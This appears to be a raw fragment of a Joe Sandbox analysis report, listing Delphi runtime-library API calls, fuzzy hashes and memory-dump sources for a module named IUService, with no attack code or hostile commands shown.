                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB2C
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB59
                                                                                                                                            • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB7E
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBA0
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBC4
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBCE
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBEB
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC0B
                                                                                                                                            • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC16
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC2C
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC3F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$From$AnsiStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Buf$qqrpbuipxvuipx14FormatLength$qqrr20RecxiStringiSysutils@$Asg$qqrr20CharChar$qqrx20Len$qqrr20StringpbiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2011730137-0
                                                                                                                                            • Opcode ID: e0ec65ee7119bda094fea1574f5fbe587e7ff05964032da46d515081ca9c0199
                                                                                                                                            • Instruction ID: 905ef9e5a7d310ec851db8a729e0b9c5fd371b18d59da8299c39f15f331ca2da
                                                                                                                                            • Opcode Fuzzy Hash: e0ec65ee7119bda094fea1574f5fbe587e7ff05964032da46d515081ca9c0199
                                                                                                                                            • Instruction Fuzzy Hash: 03515C70A05199EFDB00DFA8DD8199EB7F9FF88200B6046A6E905E7355D730EE81DB90
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                                                            • @Strutils@DupeString$qqrx20System@UnicodeStringi.RTL120(?,00000000,500168A1), ref: 50016854
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,500168A1), ref: 50016861
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500168A1), ref: 50016871
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$From$AnsiStr$qqrr20Stringx20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20Cat$qqrr20Cat3$qqrr20Char$qqrr20Copy$qqrx20DupeStr$qqriString$qqrx20StringbStringiStringiiStringt2Strutils@Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2114788560-0
                                                                                                                                            • Opcode ID: b7fb9b28b5c2121679e22dd6f35be3f677741a1e7c790f700155013dc50960c1
                                                                                                                                            • Instruction ID: 16ea5a0d39597b1b2e5b354b4af76d672fd4379d434ada6c456a148815a4d04d
                                                                                                                                            • Opcode Fuzzy Hash: b7fb9b28b5c2121679e22dd6f35be3f677741a1e7c790f700155013dc50960c1
                                                                                                                                            • Instruction Fuzzy Hash: DD514770A012998FDF00CFA9DD919AEB7F5FF49214B60466AE500E7395DB34EE81CB90
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 5002385E
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 50023891
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 500238A0
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000200,00000000,50023929), ref: 500238B4
                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238C0
                                                                                                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238C6
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238DC
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 5002390E
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$Asg$qqrr20Stringx20$Array$qqrr20Char$qqrx20Copy$qqrx20DateFormatFromLocaleStringiiStringpbiThread
                                                                                                                                            • String ID: $yyyy
                                                                                                                                            • API String ID: 1172944777-404527807
                                                                                                                                            • Opcode ID: 88830cba35c6eddecc1ac2c1449b220e654a0ef3beac0e7d82714beb81f21552
                                                                                                                                            • Instruction ID: 71332474c6b87554fb3030c3449044ef5b0949cbd634da679827f02ba86c845d
                                                                                                                                            • Opcode Fuzzy Hash: 88830cba35c6eddecc1ac2c1449b220e654a0ef3beac0e7d82714beb81f21552
                                                                                                                                            • Instruction Fuzzy Hash: 1521D634A066999FEF24DF94D891AAEB3F8EF19300F4041A6F948E7251D7709E40C7E1
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001092F,?,?), ref: 500107DE
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 500107FB
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 50010833
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,5000FDAE,00000000,5001092F,?,?), ref: 50010864
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,5000FDAE,00000000,5001092F,?,?), ref: 50010869
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 50010886
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5001092F,?,?), ref: 50010892
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 500108B3
                                                                                                                                            • @Character@TCharacter@ConvertToUtf32$qqrx20System@UnicodeStringi.RTL120(00000000,5001092F,?,?), ref: 500108CB
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120(00000000,5001092F,?,?), ref: 500108DB
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$Character@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20ConvertExcept$qqrvException@$bctr$qqrp20Initialize$qqrvLatin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@Utf32$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1571831625-0
                                                                                                                                            • Opcode ID: 85393cb161c1816bc41922dd3de2d3b0f49e4e06d07e37d77665b878cc553ffb
                                                                                                                                            • Instruction ID: db5d648a61a0c398fe2207ce4aef69e534902f808f4f142b5e1ae4a32dae8c69
                                                                                                                                            • Opcode Fuzzy Hash: 85393cb161c1816bc41922dd3de2d3b0f49e4e06d07e37d77665b878cc553ffb
                                                                                                                                            • Instruction Fuzzy Hash: AF41B230A042899FEB10DFA4DC915AEB7F5EF44300F5042A6E581D7256DBB4DE85D7D0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011688), ref: 5001158A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 500115A7
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 500115DF
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011688), ref: 50011610
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011688), ref: 50011615
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 50011632
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50011688), ref: 5001163E
                                                                                                                                            • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120(00000000,50011688), ref: 50011653
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50011688), ref: 50011661
                                                                                                                                            • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120(00000000,50011688), ref: 50011666
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$CategoryCheckSymbol$qqr26$Asg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000D365
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D41B), ref: 5000D37C
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D41B), ref: 5000D3A1
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5000D41B), ref: 5000D3B6
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,5000D41B), ref: 5000D3BF
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,5000D41B), ref: 5000D3C8
                                                                                                                                            • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,00000000,5000D41B), ref: 5000D3D1
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,00000000,5000D41B), ref: 5000D3E2
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5000D41B), ref: 5000D3EE
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5000D41B), ref: 5000D3F8
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000D422), ref: 5000D415
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$String$AnsiAsg$qqrr20Stringx20System@%$FromLength$qqrr20Str$qqrr27StringiStringusT$us$i0$%x20$Char$qqrx20Char$qqrx27Clr$qqrpvInternalRef$qqrpvT$us$i0$%Unicode$qqrpbuipcuiUtf8
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000D27D
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(00000000,5000D32F), ref: 5000D292
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D32F), ref: 5000D2B7
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120(00000000,5000D32F), ref: 5000D2CC
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,5000D32F), ref: 5000D2D5
                                                                                                                                            • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,00000000,00000000,5000D32F), ref: 5000D2DE
                                                                                                                                            • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,00000000,5000D32F), ref: 5000D2E7
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120(00000000,00000000,5000D32F), ref: 5000D2F8
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(00000000,00000000,5000D32F), ref: 5000D302
                                                                                                                                            • @System@@WStrAsg$qqrr17System@WideStringx17System@WideString.RTL120(00000000,00000000,5000D32F), ref: 5000D30C
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(5000D336), ref: 5000D321
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000D336), ref: 5000D329
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$String$Wide$Clr$qqrpv$AnsiSystem@%$FromLength$qqrr17Str$qqrr27StringiStringusT$us$i0$%x20Unicode$Asg$qqrr17Char$qqrx17Char$qqrx27FreeInternalRef$qqrpvStringx17T$us$i0$%Unicode$qqrpbuipcuiUtf8
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@ExceptionErrorMessage$qqrp14System@TObjectpvpbi.RTL120(00000800), ref: 500264B1
                                                                                                                                              • Part of subcall function 500262D0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,5002647C), ref: 50026303
                                                                                                                                              • Part of subcall function 500262D0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026327
                                                                                                                                              • Part of subcall function 500262D0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026342
                                                                                                                                              • Part of subcall function 500262D0: @Sysutils@AnsiStrRScan$qqrpbb.RTL120(?,?,00000105), ref: 50026366
                                                                                                                                              • Part of subcall function 500262D0: @Sysutils@StrLCopy$qqrpbpxbui.RTL120(?,?,00000105), ref: 5002637B
                                                                                                                                              • Part of subcall function 500262D0: @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(?,?,00000105), ref: 50026392
                                                                                                                                              • Part of subcall function 500262D0: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000105), ref: 5002639E
                                                                                                                                              • Part of subcall function 500262D0: @Sysutils@StrLen$qqrpxb.RTL120(?,?,00000105), ref: 500263A7
                                                                                                                                              • Part of subcall function 500262D0: @System@FindResourceHInstance$qqrui.RTL120(0000FFD6,?,00000100,?,?,00000105), ref: 500263D7
                                                                                                                                              • Part of subcall function 500262D0: LoadStringW.USER32(00000000,0000FFD6,?,00000100), ref: 500263DD
                                                                                                                                              • Part of subcall function 500262D0: @System@TObject@ClassName$qqrv.RTL120(?,?,00000105), ref: 500263EA
                                                                                                                                              • Part of subcall function 500262D0: @Sysutils@StrLFmt$qqrpbuit1px14System@TVarRecxi.RTL120(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 50026454
                                                                                                                                            • @System@Flush$qqrr15System@Textfile.RTL120(00000800), ref: 500264C5
                                                                                                                                            • @System@@_IOTest$qqrv.RTL120(00000800), ref: 500264CA
                                                                                                                                            • CharToOemW.USER32(?,?), ref: 500264DF
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120(?,00000000,00000800), ref: 500264F2
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000800), ref: 50026502
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000800), ref: 50026508
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,50026578,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000800), ref: 5002651D
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,50026578,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000800), ref: 50026523
                                                                                                                                            • @System@FindResourceHInstance$qqrui.RTL120(0000FFD7,?,00000040,00000800), ref: 5002653F
                                                                                                                                            • LoadStringW.USER32(00000000,0000FFD7,?,00000040), ref: 50026545
                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00002010), ref: 5002655E
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Sysutils@$File$String$ClassFindHandleInstance$qqruiLoadModuleNameResourceSystem@@Write$AnsiCharChar$qqrx20Class$qqrp14Copy$qqrpbpxbuiErrorExceptionFlush$qqrr15Fmt$qqrpbuit1px14Len$qqrpxbLen$qqrpxcMessageMessage$qqrp14MetaName$qqrvObject@Objectp17ObjectpvpbiQueryRecxiScan$qqrpbbSystem@@_Test$qqrvTextfileUnicodeVirtual
                                                                                                                                            APIs
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032AF3
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032B36
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032B4C
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032B68
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032B7E
                                                                                                                                            • @Variants@@VarToInt64$qqrrx8TVarData.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032C30
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500114E2), ref: 500113BB
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 500113D8
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 50011410
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500114E2), ref: 50011441
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500114E2), ref: 50011446
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 50011463
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 5001148D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 500114AC
                                                                                                                                            • @Character@TCharacter@IsSurrogatePair$qqrxbxb.RTL120(00000000,500114E2), ref: 500114BC
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                                                              • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024620), ref: 50024537
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50024620), ref: 5002454D
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024620), ref: 5002455D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50024620), ref: 5002457A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50024620), ref: 500245A2
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000000,50024620), ref: 500245B6
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,?,00000000,50024620), ref: 500245C0
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,?,00000000,50024620), ref: 500245CD
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000400,00000001,00000000,?,00000000,?,?,00000000,50024620), ref: 500245F1
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@GetModuleName$qqrui.RTL120(00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A67B
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A686
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6A3
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6B2
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6B7
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6E5
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120(?,?,?,00000003,00000000,00000000), ref: 5002A6F7
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A720
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120(?,?,?,00000003,00000000,00000000), ref: 5002A733
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A758
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500117DF), ref: 500116C6
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 500116E3
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 5001171B
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500117DF), ref: 5001174C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500117DF), ref: 50011751
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 5001176E
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,500117DF), ref: 5001177A
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,500117DF), ref: 50011788
                                                                                                                                            • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,500117DF), ref: 50011798
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010C23), ref: 50010B0A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010B27
